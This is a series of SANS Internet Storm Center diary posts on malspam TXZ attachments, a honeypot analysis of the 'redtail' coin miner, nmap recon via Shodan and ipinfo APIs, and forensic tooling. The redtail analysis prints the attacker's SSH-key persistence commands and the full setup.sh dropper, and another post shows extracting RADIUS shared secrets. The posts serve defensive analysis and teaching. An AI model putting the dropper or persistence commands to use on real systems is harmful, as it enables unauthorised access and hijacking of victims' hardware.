From observing the DShield SIEM to manually parsing the logs, find what works best for you and take time to review the data, extract interesting information, and develop the attack observation report over a few days.  

[1] https://github.com/bruneaug/DShield-SIEM
[2] https://malwr.ee/ 
[3] https://www.joesandbox.com/  
[4] https://www.digitalocean.com/community/tutorials/how-to-transform-json-data-with-jq 
[5] https://github.com/jrjobe/DShield-Cowrie-json-Parser 
[6] https://www.sans.edu/cyber-security-programs/bachelors-degree/

A few portions of this post were written with the assistance of ChatGPT; most of the content is original - https://chatgpt.com/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Files with TXZ extension used as malspam attachments, (Mon, May 27th)

Malicious e-mail attachments come in all shapes and sizes. In general, however, threat actors usually either send out files, which themselves carry a malicious payload – such as different scripts, Office documents or PDFs – or they send out “containers”, which include such files – e.g., image files or archives. These container files, especially, can sometimes be quite unusual… Which is where today’s diary comes in.

While going over messages that were caught in my malspam traps over the course of May, I found multiple e-mails that carried files with the TXZ extension as their attachments. Since this extension is hardly the most common one, I needed quick help from Google to find that it is associated with Tar archives compressed with XZ Utils[1]. It seems that even when it comes to malicious e-mail attachments, use of this extension is relatively unusual: a quick check revealed that my malspam traps hadn't caught any such files in 2021, only one file in 2022, and none in 2023.

As it turned out, however, both the 2022 file and the current files that my malspam traps caught were actually not TXZ files, but renamed RAR archives.

Although threat actors commonly modify the extensions of malicious files they send out, I was a little mystified by the change in this case, given the aforementioned less-than-common use of TXZ files and, presumably, their limited support by archiving utilities. Further Google searching, however, soon revealed the reason for it.

It turned out that TXZ (and RAR) files were among the filetypes for which Microsoft added native support to Windows 11 late last year[2]. Potential recipients of the malicious messages who used this operating system might therefore have been able to open the attachments simply using standard Windows file explorer, even if the extension and the file type were mismatched.
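Since the filename lies here, the reliable tell is the file's magic bytes: RAR archives start with `Rar!\x1a\x07`, while real XZ data starts with `\xfd7zXZ`. A quick content check along these lines (a sketch, not a substitute for a proper file-type library):

```python
# Known file signatures (magic bytes) at offset 0.
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"
XZ_MAGIC = b"\xfd7zXZ\x00"

def sniff(header: bytes) -> str:
    """Classify a file by its leading bytes rather than its extension."""
    if header.startswith(RAR5_MAGIC) or header.startswith(RAR4_MAGIC):
        return "rar"
    if header.startswith(XZ_MAGIC):
        return "xz"
    return "unknown"

# with open("attachment.txz", "rb") as f:
#     print(sniff(f.read(8)))  # a renamed RAR archive reports "rar"
```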

It is worth noting that although multiple e-mails were caught in the traps, they all belonged to one of two campaigns.

Messages from the first campaign contained texts in Spanish and Slovak languages and were used to distribute a 464 kB PE file with GuLoader malware, which had 53/74 detections on Virus Total at the time of writing[3].

Messages from the second campaign contained texts in Croatian and Czech languages and were used to distribute a 4 kB batch file downloader for the FormBook malware, which – at the time of writing – had 31/62 detection rate on Virus Total[4].

Even though attachments with the TXZ extension probably won't become the new "go-to" for threat actors when it comes to malspam, these examples show that they are in active use, at least in some regionally targeted campaigns. And although "blocklisting the bad" is hardly an ideal overall security approach, in this case it might be worth considering whether blocking or quarantining messages carrying these files (or blocking attachments with the TXZ extension in mail agents) wouldn't be a reasonable course of action, provided these files aren't commonly used in the context of a specific organization.

[1] https://fileinfo.com/extension/txz
[2] https://www.bleepingcomputer.com/news/microsoft/windows-11-adds-support-for-11-file-archives-including-7-zip-and-rar/
[3] https://www.virustotal.com/gui/file/3f060b4039fdb7286558f55295064ef44435d30ed83e3cd2884831e6b256f542
[4] https://www.virustotal.com/gui/file/1ab5f558baf5523e460946ec4c257a696acb785f7cc1da82ca49ffce2149deb6

IoCs
CW_00402902400429.bat
MD5: cade54a36c9cc490216057234b6e1c55
SHA-1: 31c0f43c35df873e73858be2a8e8762b1e195edd
SHA-256: 1ab5f558baf5523e460946ec4c257a696acb785f7cc1da82ca49ffce2149deb6

IMG_SMKGKZ757385839500358358935775939058735RepollPsyllid.exe
MD5: c7f827116e4b87862fc91d97fd1e01c7
SHA-1: d28d1b95adbe8cfbedceaf980403dd5921292eaf
SHA-256: 3f060b4039fdb7286558f55295064ef44435d30ed83e3cd2884831e6b256f542

-----------
Jan Kopriva
@jk0pr | LinkedIn
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA 4.5.1 Release, (Sun, May 26th)

YARA 4.5.1 was released with a small change to the regex syntax (allowing more whitespace) and many bugfixes.

Victor considers that although YARA-X (the rewrite of YARA in Rust) is still in beta, you can start to use it now.

From his blog post "YARA is dead, long live YARA-X":

YARA-X is still in beta, but is mature and stable enough for use, specially from the command-line interface or one-shot Python scripts. While the APIs may still undergo minor changes, the foundational aspects are already established.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

csvkit, (Sat, May 25th)

After reading my diary entry "Checking CSV Files", a reader informed me that CSV toolkit csvkit also contains a command to check CSV files: csvstat.py.

Here is this tool running on the same CSV file I used in my diary entry:

csvkit has a lot of dependencies; it took me quite some effort to install it on a machine without an Internet connection. I had to download, transfer and install 50+ packages.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Analysis of "redtail" File Uploads to ICS Honeypot, a Multi-Architecture Coin Miner [Guest Diary], (Wed, May 22nd)

[This is a Guest Diary by Robert Riley, an ISC intern as part of the SANS.edu BACS program]

Introduction

Honeypot file uploads can be like opening Pandora's box: you never know what may get uploaded. Malware comes in all sorts of varieties and flavors, many suited for specific purposes and some for several. Today, we'll look at malware named "redtail", which falls under the category of coin miners: software illegally installed on hosts to covertly mine cryptocurrency for a remote actor by hijacking the host's resources. The question we'd like answered is what capabilities modern coin miners possess, and how they can be identified. Combining this information with modern threat feeds could give further insight into the threat actors perpetuating this attack, while also giving a glimpse into the current capabilities of coin miner malware actively used in today's threat landscape.

Description of the Subject

The “redtail” samples being evaluated offer a look into a modern variant of coin miner malware used in the wild today. The samples are interesting in that they can run on 4 different CPU architectures, showing just how many devices/hosts this malware could potentially infect. We’ll look into how the threat actor gained initial access, who the threat actors are, the different samples uploaded, and how these samples were identified as a coin miner.

Initial Analysis of the Attack

The analysis began as an earlier attack observation [8]. I started by evaluating the IP 193.222.96.163, which was first seen connecting to the honeypot over SSH port 2222 on Feb 23rd at 12:23:25 2024, showing rapid back-to-back logins in increments of 23 (a sign of bot behavior). After failing to log in with the [root/lenovo] credentials, the actor successfully logged in using the [root/Passw0rd123] credentials. After authentication, the actor uploaded a total of 5 files to the honeypot (redtail.arm7, redtail.arm8, redtail.i686, redtail.x86_64, setup.sh).

The actor then runs commands that make the setup.sh file executable, then adds a custom public key to the ~/.ssh/authorized_keys file before making that file unmodifiable with chattr. The full commands used are pasted below:

chmod +x setup.sh; sh setup.sh;
rm -rf setup.sh;
mkdir -p ~/.ssh;
chattr -ia ~/.ssh/authorized_keys;
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys;
chattr +ai ~/.ssh/authorized_keys;
uname -a

Taking a closer look at the code for setup.sh shows us even more about the intentions of the remote IP. Namely, the shell script attempts to determine the host architecture based on the output of uname -mp. Using this, the script copies the contents of the relevant redtail executable to a hidden “.redtail” file on the host and executes this new file, after which the originally uploaded, unhidden redtail files are deleted. If the architecture cannot be determined, all of the “redtail” file contents are copied to the “.redtail” file in turn for good measure. The code is pasted below for more details:

#!/bin/bash

NOARCH=false;
ARCH="";
FOLDER="";

if [ -f "/bin/uname" ] && [ -f "/bin/grep" ]; then
        ARCH=$(uname -mp);
        if echo "$ARCH" | grep -q "x86_64" ; then
                ARCH="x86_64";
        elif echo "$ARCH" | grep -q "i686"; then
                ARCH="i686";
        elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
                ARCH="arm8";
        elif echo "$ARCH" | grep -q "armv7"; then
                ARCH="arm7";
        else
                NOARCH=true;
        fi
else
        NOARCH=true;
fi

#sysctl -w vm.nr_hugepages=$(nproc)

#for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d);
#do
#    echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages";
#done

FOLDER=$(find / -writable -executable -readable -not -path "/proc/*" | head -n 1 || echo /tmp);
CURR=${PWD}

if [ "$CURR" != "$FOLDER" ]; then
        mv redtail.* $FOLDER
        cd $FOLDER
fi

if [ "$NOARCH" = true ]; then
        cat redtail.x86_64 > .redtail; chmod +x .redtail; ./.redtail;
        cat redtail.i686 > .redtail; chmod +x .redtail; ./.redtail;
        cat redtail.arm8 > .redtail; chmod +x .redtail; ./.redtail;
        cat redtail.arm7 > .redtail; chmod +x .redtail; ./.redtail;
else
        cat "redtail.$ARCH" > .redtail; chmod +x .redtail; ./.redtail;
fi

rm -rf redtail.*

Just doing a hash lookup on any of the redtail files quickly determines that its goal is coin mining, as looking up the hash of each file on Virus Total tags these files with such labels. The sample showed behaviors such as executing crontab and modifying iptables rules, shows the UPX packing common in other coin miners, and listens on a newly created socket.
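Reproducing the hash lookup step is straightforward; a sketch that computes the SHA-256 to paste into Virus Total:

```python
import hashlib

def sha256_hex(data: bytes) -> str:
    """SHA-256 hex digest of file content, suitable for a VT hash lookup."""
    return hashlib.sha256(data).hexdigest()

# with open("redtail.x86_64", "rb") as f:
#     print(sha256_hex(f.read()))
```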

Digging Deeper

The first IP, x.x.x.163, is located in either the Netherlands or France and comes from the ISP Constant MOULIN.  Doing a quick reputation analysis on this IP, we see that this attack is one of the first recorded instances of its malicious behavior [2], a VT score of 23/90 [1], and a 100% confidence of abuse [3].  This IP still generates reports today, both on my honeypot and in the wild.  Regarding “redtail” file uploads, there are 5 recorded separate occasions on which this IP successfully uploaded “redtail” & “setup.sh” files to the honeypot, in each case after first authenticating as the “root” user.  The most recent activity from this IP on the honeypot is as recent as 5/2, trying to guess SSH usernames and passwords.  Below is the complete activity of this IP, with the 5 “redtail” submissions marked.

It gets more interesting when looking at all the IPs that tried to submit these "redtail" and "setup.sh" files, as only two IPs engaged in this activity: 193.222.96.163 & 45.95.147.236, the second being one we haven’t evaluated yet. This second IP, x.x.x.236, located in the Netherlands, belongs to the Alsycon Media B.V. ISP. A similar reputation analysis on this IP shows malicious activity as far back as 10/7/2024 [5], a VT score of 17/91 [4], and once again a 100% confidence of abuse [6]. On the honeypot, this IP was first seen on 1/28/2024, making it the first IP seen engaging in this activity. The IP tried to log in via SSH using brute force, although curiously, upon successfully logging in, it disconnected shortly after. It wasn’t until about two weeks later, on 2/11, that we see successful “redtail” & “setup.sh” file uploads after authenticating with the [root/lenovo] username/password combo. The last time this IP was seen is 3/20/2024, trying to log in via SSH with the [root/a] username/password combo.

This is the only recorded instance of file uploads from this IP, which otherwise engages in a wider variety of behaviors against this endpoint than the primary IP, x.x.x.163.  These include connecting to various SSH ports, many different username/password submissions, and at one point even URL requests (with interesting user agents).  It’s interesting to note that the primary IP, x.x.x.163, may also be geographically located in the Netherlands like the secondary IP, but this can’t be confirmed because the ISP spans multiple countries.  If both IPs are in the NL, one could argue that both belong to the same threat actor, but that is speculative.  For the most part, however, most of the activity comes from the primary IP, x.x.x.163.

Looking closer at the “redtail” and “setup.sh” files themselves by hash reveals interesting info about the IPs that upload them to the honeypot.  Out of the 28 unique hashes ever submitted, every single file submission had a Virus Total score of at least 19, another piece of evidence of maliciousness [7].  Each batch of “redtail” files had unique hashes that were only used in that batch: the 4 “redtail” files submitted during the initial analysis of the primary IP’s 2/23 submission were never used again by either IP, and this holds for every one of the 6 batch submissions of “redtail” files between both IPs.  The exception to this rule was the “setup.sh” file, which had 2 hashes that were each submitted twice on different dates.
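Spotting which hashes repeat across submissions is a simple frequency count; a sketch with made-up hash values (not the actual hashes from the attached sheet):

```python
from collections import Counter

def repeated(hashes):
    """Return hashes seen more than once across all submissions."""
    return sorted(h for h, n in Counter(hashes).items() if n > 1)

# Hypothetical submission log: only the setup.sh hash repeats.
seen = ["aaa1", "bbb2", "ccc3", "bbb2", "ddd4"]
print(repeated(seen))  # prints: ['bbb2']
```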

Conclusion

This analysis stuck out for a few reasons.  One was the sheer number of file submissions: over 400 separate submissions over the course of about 4 months.  Another was how all these submissions came from only two IPs in roughly the same geographic area.  Together, these give insight into more modern variants of coin miner malware and the threat actors spreading them.

[1] https://www.virustotal.com/gui/ip-address/193.222.96.163 (23/90 VT score)
[2] https://isc.sans.edu/ipinfo/193.222.96.163 (5/10 risk score)
[3] https://www.abuseipdb.com/check/193.222.96.163 (100% confidence of abuse)
[4] https://www.virustotal.com/gui/ip-address/45.95.147.236 (17/91 VT score)
[5] https://isc.sans.edu/ipinfo/45.95.147.236 (0/10 risk score)
[6] https://www.abuseipdb.com/check/45.95.147.236 (100% confidence of abuse)
[7] “Hash Info.csv” – Sheet of all file submissions w/ info (attached)
[8] “Attack Observation #5.pdf” – AO where initial analysis of primary IP was done (attached)
[9] https://github.com/bruneaug/DShield-SIEM (provided visualizations)
[10] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

NMAP Scanning without Scanning (Part 2) - The ipinfo API, (Wed, May 22nd)

Going back a year or so, I wrote a story on passive recon, specifically the IPINFO API (https://isc.sans.edu/diary/28596).  This API returns various information on an IP address: the registered owning organization and ASN, and a (usually reasonably accurate) approximation of where that IP might reside.
Looking at yesterday's story, I thought to myself, why not port my script from last year to an NMAP NSE script?  So I did!

Using the shodan-api nmap script as a template, I updated the following lines:

The actual API call of course is different:
  local response = http.get("ipinfo.io", 443, "/".. target .."/json?token=" .. registry.apiKey, {any_af = true})

This was a simple change; since the API key is still represented as a parameter in the URI, this was just plug-and-play.

Also, because of differing return formats, in that same function I removed all the error checking of the returned values and replaced it with a simple return:
  return response.body

Note that there is a line
-- local apikey =""
If you want to embed your own API key into this script, remove the "--" (comment characters) and put your key in that line.

As with the Shodan script, you can tack IPINFO on to an existing active scan, or you can run it passively with "-sn -Pn -n" as:

nmap -Pn -sn -n 8.8.8.8 --script ipinfo.nse --script-args "ipinfo.apikey=<your apikey goes here>"
Starting Nmap 7.92 ( https://nmap.org ) at 2024-05-21 11:34 Eastern Daylight Time
Nmap scan report for 8.8.8.8
Host is up.

Host script results:
| ipinfo: {
|   "ip": "8.8.8.8",
|   "hostname": "dns.google",
|   "anycast": true,
|   "city": "Mountain View",
|   "region": "California",
|   "country": "US",
|   "loc": "37.4056,-122.0775",
|   "org": "AS15169 Google LLC",
|   "postal": "94043",
|   "timezone": "America/Los_Angeles"
|_}

Post-scan script results:
|_ipinfo: IPInfo done: 0 hosts up.
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
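The same JSON is easy to consume outside nmap as well; a sketch that condenses the fields most useful during triage from an ipinfo response (the sample below is taken from the output shown above):

```python
import json

def summarize_ipinfo(raw: str) -> str:
    """Condense an ipinfo.io JSON response to a one-line triage summary."""
    d = json.loads(raw)
    return f'{d.get("ip")}: {d.get("org", "?")} ({d.get("city", "?")}, {d.get("country", "?")})'

ipinfo_sample = '''{"ip": "8.8.8.8", "hostname": "dns.google", "city": "Mountain View",
"region": "California", "country": "US", "org": "AS15169 Google LLC"}'''
print(summarize_ipinfo(ipinfo_sample))  # prints: 8.8.8.8: AS15169 Google LLC (Mountain View, US)
```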

Simple as that!  Now I can return host ownership and location info with my nmap scans, or, if I'm in a hurry, instead of the normal nmap scan!  This information can be pretty handy when analyzing potential attacks, for instance looking at a failed authentication to see if the geography matches where that person could conceivably be; you only have to go back a few days to my post on VPN credential stuffing attacks for an example of this.

I've got one more of these APIs in the hopper - if you have another recon API you'd like to see in an nmap script, by all means let me know in our comment form!

All of my recon scripts (both the command-line and the nmap scripts) are posted in my github: https://github.com/robvandenbrink/recon_scripts

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scanning without Scanning with NMAP (APIs FTW), (Tue, May 21st)

A year ago I wrote up using Shodan's API to collect info on open ports and services without actually scanning for them (Shodan's API for the (Recon) Win!).  This past week I was trolling through the NMAP scripts directory, and imagine my surprise when I stumbled on shodan-api.nse.
So the network scanner we all use daily can be used to scan without actually scanning?  Apparently yes!

First the syntax:
nmap <target> --script shodan-api --script-args 'shodan-api.apikey=SHODANAPIKEY'
(note: use double quotes for script-args if you are doing this in Windows)

This still does a basic scan of the target host though.  To do this without scanning, without even sending any packets to your host, add:

-sn do a ping scan (ie we're not doing a port scan)
-Pn Don't ping the host, just assume that it's online

Neat trick there eh?  This essentially tells nmap to do nothing for each host in the target list, but don't forget that script we asked you to run!

This also has the advantage of doing the "scan" even if the host is down (or doesn't respond to a ping)

Plus, just to be complete:
-n  Don't even do DNS resolution
This way NMAP isn't sending anything to the host or even to hosts under the client's control (for instance if they happen to host their own DNS).

If you're doing a whole subnet, or the output is large enough to scroll past your buffer, or if you want much (much) more useful output, add this to your script-args clause:
shodan-api.outfile=outputfile.csv

Let's put this all together:

nmap -sn -Pn -n www.cisco.com --script shodan-api --script-args "shodan-api.outfile=out.csv,shodan-api.apikey=<my-api-key-not-yours>"
Starting Nmap 7.92 ( https://nmap.org ) at 2024-05-17 09:53 Eastern Daylight Time
Nmap scan report for www.cisco.com (184.26.152.97)
Host is up.

Host script results:
| shodan-api: Report for 184.26.152.97 (www.static-cisco.com, www.cisco.com, www.mediafiles-cisco.com, www-cloud-cdn.cisco.com, a184-26-152-97.deploy.static.akamaitechnologies.com)
| PORT  PROTO  PRODUCT      VERSION
| 80    tcp    AkamaiGHost
|_443   tcp    AkamaiGHost

Post-scan script results:
| shodan-api: Shodan done: 1 hosts up.
|_Wrote Shodan output to: out.csv
Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds

Neat eh?  It collects the product and version info (when it can get it).  The CSV file looks like this:

IP,Port,Proto,Product,Version
184.26.152.97,80,tcp,AkamaiGHost,
184.26.152.97,443,tcp,AkamaiGHost,

This file format is a direct import into a usable format in powershell, python or just about any tool you might desire, even Excel :-)
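For example, a few lines of Python turn that CSV into a ports-per-host view:

```python
import csv
import io
from collections import defaultdict

def ports_per_host(csv_text: str):
    """Group (port, proto) tuples by IP from shodan-api.nse CSV output."""
    hosts = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        hosts[row["IP"]].append((int(row["Port"]), row["Proto"]))
    return dict(hosts)

# The sample output from the scan above:
csv_sample = """IP,Port,Proto,Product,Version
184.26.152.97,80,tcp,AkamaiGHost,
184.26.152.97,443,tcp,AkamaiGHost,
"""
print(ports_per_host(csv_sample))
```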

Looking at a more "challenging" scan target:

nmap -sn -Pn -n isc.sans.edu --script shodan-api --script-args "shodan-api.outfile=out.csv,shodan-api.apikey=<my-api-key-not-yours>"

IP,Port,Proto,Product,Version
45.60.103.34,25,tcp,,
45.60.103.34,43,tcp,,
45.60.103.34,53,tcp,,
45.60.103.34,53,udp,,
.. and so on.

Look at line 4!  If you've ever done a UDP scan, you know that it can take for-e-ver!  Since this is just an api call, it collects both tcp and udp info from Shodan.

How many ports are in the output?
type out.csv | wc -l
    160

159 ports, that's how many! (subtract one for the header line)  This would have taken a while with a regular port scan, but with a shodan query it finishes in how long?

Post-scan script results:
| shodan-api: Shodan done: 1 hosts up.
|_Wrote Shodan output to: out.csv
Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds

Yup, 1.2 seconds!

This script is a great addition to nmap, it allows you to do a quick and dirty scan for what ports and services have been available recently, with a bit of rudimentary info attached.

Did you catch that last hint?  If you're doing a pentest, it's well worth digging into that word "recently".  Looking at ports that are in the Shodan list but aren't in a real portscan (the one you'd get from nmap -sT or -sU) can be very interesting.  These are services that the client has recently disabled, maybe just for the duration of the pentest.  For instance, that FTP server or totally vulnerable web or application server that they have open "only when they need it" (translation: always, except during the annual pentest).  If you can pull a diff report between what's in the Shodan output and what's actually there now, that's well worth looking into, say for instance using archive.org.  If you do find something good, my bet is that it falls into your scope!  If not, you should update your scope to "services found during the test in the target IP ranges or DNS scopes" or similar.  You don't want something like this excluded simply because it's (kinda) not there during the actual assessment :-)
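That diff report boils down to a set difference between Shodan's recent view and the live scan; a sketch with hypothetical port lists:

```python
def recently_closed(shodan_ports, live_ports):
    """Ports Shodan saw recently that aren't open now - worth asking about."""
    return sorted(set(shodan_ports) - set(live_ports))

# Hypothetical: FTP and an admin web port vanish during the test window.
print(recently_closed([21, 80, 443, 8443], [80, 443]))  # prints: [21, 8443]
```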

Got another API you'd like to see used in NMAP?  Please use our comment form.  Stay tuned, I have a list, but if you've got one I haven't thought of I'm happy to add another one!

===============
Rob VandenBrink
rob<at>coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Analyzing MSG Files, (Mon, May 20th)

.msg email files are ole files and can be analyzed with my tool oledump.py.

They have a lot of streams, so finding the information you need (body, headers, attachments, ...) can take some time searching.

That's why I have a plugin that summarizes important information from .msg files: plugin_msg.summary.py.

This is how its output looks when I run it on a .msg file with a malicious attachment:

While showing a friend my plugin features, I got the idea to make some updates to this plugin.

First, when attachments are inline and/or hidden, that information is added to the attachment overview, as can be seen in the screenshot above for attachment 0.

Inline attachments are typically pictures that have been pasted into the email's body, and do not appear as separate attachments when the email is opened in Outlook, for example.

If you are analyzing an email for malicious attachments, you can first focus on attachments that are not inline.

This information also appears when outputting JSON information for the analyzed .msg file:

Second, I added a new option to output JSON information for the attachments with their contents, so that these attachments can be analyzed as I explained in recent diary entries "Analyzing PDF Streams" and "Another PDF Streams Example: Extracting JPEGs".

This JSON output can be piped into my other tools that support this JSON format, like file-magic.py (to identify the file type based on its content):

If an attachment is inline and/or hidden, this -J output option prefixes the attachment name in the JSON output:

And I also updated my plugin plugin_msg.py to parse property streams. This is where information like inline and hidden are stored:

As can be seen in the screenshots, there are also properties for timestamps like creation time and last modification time.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Another PDF Streams Example: Extracting JPEGs, (Fri, May 17th)

In my diary entry "Analyzing PDF Streams" I showed how to use my tools file-magic.py and myjson-filter.py together with my PDF analysis tool pdf-parser.py to analyze PDF streams en masse.

In this diary entry, I will show how file-magic.py can augment JSON data produced by pdf-parser.py with file-type information that can then be used by myjson-filter.py to filter out the files you are interested in. As an example, I will extract all JPEGs from a PDF document.

First, let's produce statistics with pdf-parser.py's option -a:

This confirms that there are many "Indirect objects with a stream" in this document.

Next, I let pdf-parser.py produce JSON output (--jsonoutput) with the content of the unfiltered streams, and I let file-magic.py consume this JSON output (--jsoninput) to try to identify the file type of each stream based on its content (since streams don't have a filename, there is no filename extension and we need to look at the content):

If we use option -t to let file-magic.py just output the file type (and not the file/stream name), we can make statistics with my tool count.py and see that the PDF document contains many JPEG files:

Now we want to write all of these JPEG images to disk. We use file-magic.py again in JSON mode, but let it also output the same JSON data augmented with file-type information (--jsonoutput):

Next, this JSON data is consumed by myjson-filter.py and filtered with a case-sensitive regular expression on the file type: -t JPEG.

Finally, we write the JPEG images to disk with -W hashext:jpeg: this writes each JPEG stream to disk with a filename consisting of the sha256 of the file's content and extension .jpeg.

By using the hash of the content as filename, there are no duplicate pictures:
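The content-hash naming trick generalizes beyond pdf-parser.py; a sketch of the idea (not Didier's implementation):

```python
import hashlib

def hashext_name(content: bytes, ext: str = "jpeg") -> str:
    """Name a file after the SHA-256 of its content, so duplicates collapse."""
    return f"{hashlib.sha256(content).hexdigest()}.{ext}"

# Two identical streams map to the same filename, so writing both
# leaves only one file on disk:
a = hashext_name(b"same picture bytes")
b = hashext_name(b"same picture bytes")
# a == b
```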

Should you want to reproduce the commands in these diary entries with the exact same PDF files I used, my old ebook on PDF analysis can be found here and the analysis on TLS backdoors done by a colleague can be found here.

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Why yq? Adventures in XML, (Thu, May 16th)

I was recently asked to <ahem> "recover" a RADIUS key from a Microsoft NPS server.  No problem I think, just export the config and it's all there in clear text right?

... yes, sort of ...

The XML file that gets output is of course perfect XML, but that doesn't mean it's easy for a human to read; it's as scrambled as my weekend eggs.  I got my answer, but then of course started to look for a way to get it more easily, something I could document and hand off to my client.  In other words, I started on the quest for a "jq"-like tool for XML.  Security work often involves taking input in one text format and converting it to something that's human readable, or more easily parsed by the next tool in the pipeline.  (see below)

XMLLint is a pretty standard one that's in Linux, you can get it by installing libxml2.  Kali has it installed by default - usage is very straightforward:

xmllint < file.xml

or

cat file.xml | xmllint

There are a bunch of output options, but because it's not so Windows-friendly I didn't dig too far - run man xmllint or browse here: https://gnome.pages.gitlab.gnome.org/libxml2/xmllint.html if you need more than the basics on this.

However, finding something like this for Windows turned into an adventure - there's a port of xmllint for Windows, but it's in that 10-year age range that makes me a bit leery to install it.  With a bit of googling I found yq.

This is a standalone install on most Linux distros (sudo apt-get install yq or whatever), and has a few standard install methods for Windows:

  • you can just download the binary and put it in your path
  • choco install yq
  • winget install --id MikeFarah.yq

yq is written to mimic jq, like you'd expect from the name, but will take json, yaml, xml, csv and tsv files.  It's not as feature-heavy as jq, but it's got enough - and let's face it, most of us use these for pretty-print output so that we can grep against it anyway.
I especially liked it for today's problem because I can adjust the indent; since the NPS XML export has a fairly deep hierarchy, I went with an indent of 1:

type nps-export.xml | yq --input-format xml --output-format xml --indent 1 > pretty.xml
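
As a side note, if installing tools isn't an option, Python's standard library can do similar pretty-printing; a rough equivalent of the indent-1 conversion above (a sketch, not a drop-in replacement for yq):

```python
import xml.dom.minidom

def pretty_xml(raw: str, indent: str = " ") -> str:
    """Re-indent an XML document, similar in spirit to yq's --indent option."""
    pretty = xml.dom.minidom.parseString(raw).toprettyxml(indent=indent)
    # toprettyxml emits blank lines for whitespace-only text nodes; drop them
    return "\n".join(line for line in pretty.splitlines() if line.strip())

sample = "<Clients><Children><DEVICE name='X'><Properties/></DEVICE></Children></Clients>"
print(pretty_xml(sample))
```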

A quick peek at the file found me my answer in the pretty (and grep-able) format that I wanted.  A typical RADIUS client section looks like:

 <Clients name="Clients">
  <Children>
   <DEVICE name="DEVICENAME">
    <Properties>
     <Client_ _Template_Guid="_Template_Guid" xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">{00000000-0000-0000-0000-000000000000}</Client_>
     <IP_Address xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">IP.Address.Goes.Here</IP_Address>
     <NAS_Manufacturer xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</NAS_Manufacturer>
     <Opaque_Data xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></Opaque_Data>
     <Radius_Client_Enabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</Radius_Client_Enabled>
     <Require_Signature xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">0</Require_Signature>
     <Shared_Secret xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">SuperSecretSharedKeyGoesHere</Shared_Secret>
     <Template_Guid xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">{1A1917B8-D2C0-43B3-8144-FAE167CE9316}</Template_Guid>
    </Properties>


Or I could dump all the shared secrets with the associated IP Addresses with:

type pretty.xml | findstr "IP_Address Shared_Secret"

or

cat pretty.xml | grep 'IP_Address\|Shared_Secret'
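
The findstr/grep approach loses which secret belongs to which client once the lines are separated.  An XML-aware pass keeps them paired; here's a sketch in Python against the structure shown above (element names are taken from the sample export, and the sample values are made up):

```python
import xml.etree.ElementTree as ET

SAMPLE = """<Clients name="Clients"><Children>
 <DEVICE name="DEVICENAME"><Properties>
  <IP_Address xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">192.0.2.10</IP_Address>
  <Shared_Secret xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">SuperSecret</Shared_Secret>
 </Properties></DEVICE>
</Children></Clients>"""

def radius_clients(xml_text: str):
    """Yield (client name, IP address, shared secret) for each RADIUS client."""
    root = ET.fromstring(xml_text)
    for device in root.iter():
        props = device.find("Properties")
        if props is None:
            continue
        yield device.get("name"), props.findtext("IP_Address"), props.findtext("Shared_Secret")

for name, ip, secret in radius_clients(SAMPLE):
    print(f"{name}: {ip} -> {secret}")
```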

After all that, I think I've found my go-to for text file conversions - in particular xml or yaml, especially on Windows.

Full details on these two tools discussed:
https://github.com/mikefarah/yq
https://linux.die.net/man/1/xmllint

If you've got a different text formatter (or un-formatter), or if you've used xmllint or yq in an interesting way, please let us know about it in our comment form!

===============
